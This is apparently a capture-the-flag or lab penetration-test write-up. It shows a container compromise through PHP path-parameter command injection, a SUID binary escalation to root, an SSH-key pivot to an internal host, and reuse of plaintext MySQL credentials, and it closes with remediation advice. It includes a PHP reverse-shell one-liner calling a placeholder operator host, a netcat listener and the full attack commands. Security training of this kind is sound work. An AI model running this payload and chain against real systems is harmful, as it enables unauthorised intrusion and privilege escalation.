PHP path injection, container SUID escape, and internal SSH pivot
Intermediate container engagement: index.php path parameter enabled RCE as www-data; SUID crypt binary dropped root in-container; mike’s SSH key pivoted to host2 where MySQL credentials enabled su to root.
- Case files
- PHP path injection, container SUID escape, and internal SSH pivot
External web RCE landed us inside a container. A misplaced SUID binary and a planted SSH key moved us onto an internal host where database credentials completed root.
nmap and gobuster identified index.php. path=/ listed the filesystem; injected PHP opened a reverse shell.
SUID binary /usr/share/man/zh_TW/crypt with argument mike returned a root shell.
mike’s id_rsa authenticated to 172.16.20.6. MySQL users table held root’s password for su.
Engagement summary
External web RCE landed us inside a container. A misplaced SUID binary and a planted SSH key moved us onto an internal host where database credentials completed root.
Against 10.49.172.109, gobuster found index.php accepting a path parameter that listed directories and accepted command injection. A reverse shell as www-data revealed dual interfaces (192.168.250.10 / 172.16.20.2). /usr/share/man/zh_TW/crypt was SUID root and accepted username mike for a root shell. mike’s id_rsa authenticated to 172.16.20.6 (host2). Local MySQL held root’s password for su.
Business impact
Untrusted path handling is RCE. SUID binaries in documentation trees and SSH keys left for lateral movement indicate weak container hardening and secret hygiene across the internal segment.
Web enumeration and path-parameter RCE
nmap and gobuster identified index.php. path=/ listed the filesystem; injected PHP opened a reverse shell.
OPERATOR · NMAP
savvy@lab:~$ nmap -sV 10.49.172.109
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
80/tcp open tcpwrapped
8022/tcp open ssh OpenSSH 8.2p1 Ubuntu
OPERATOR · GOBUSTER
savvy@lab:~$ gobuster dir -u http://10.49.172.109 -x php,txt,html -w directory-list-2.3-medium.txt
/index.php (Status: 200)
/info.php (Status: 200)
OPERATOR · PATH ABUSE
savvy@lab:~$ curl 'http://10.49.172.109/index.php?path=/'
total 28K
<!-- where is the path ? -->
# inject PHP reverse shell via path parameter
savvy@lab:~$ nc -lvnp 1234
savvy@lab:/var/www/html$
PAYLOAD
;php -r '$s=fsockopen("OPERATOR_IP",1234);proc_open("sh",[$s,$s,$s],$p);'In-container privilege escalation
SUID binary /usr/share/man/zh_TW/crypt with argument mike returned a root shell.
OPERATOR · SUID
savvy@lab:~$ find / -user root -perm /4000 2>/dev/null
/usr/share/man/zh_TW/crypt
savvy@lab:~$ /usr/share/man/zh_TW/crypt mike
root@lab:~# whoami
root
root@lab:~# ifconfig
eth0: inet 192.168.250.10
eth1: inet 172.16.20.2
SSH pivot and MySQL credential reuse
mike’s id_rsa authenticated to 172.16.20.6. MySQL users table held root’s password for su.
OPERATOR · PIVOT
root@lab:/home/mike$ ssh mike@172.16.20.6 -i .ssh/id_rsa
Welcome to Ubuntu 18.04.5 LTS
savvy@lab:~$ ss -tulnp
tcp LISTEN 127.0.0.1:3306
savvy@lab:~$ mysql -u mike -p
Enter password: password
SQL
show databases;
use accounts;
select * from users;
-- root | bjsig4868fgjjeog
-- mike | caOPERATOR · SU ROOT
savvy@lab:~$ su root
Password: bjsig4868fgjjeog
root@lab:~#
Remediation
Parameterize and sanitize path inputs, remove SUID from non-system binaries, do not store SSH private keys for lateral hosts inside containers, and never keep plaintext passwords in MySQL application tables.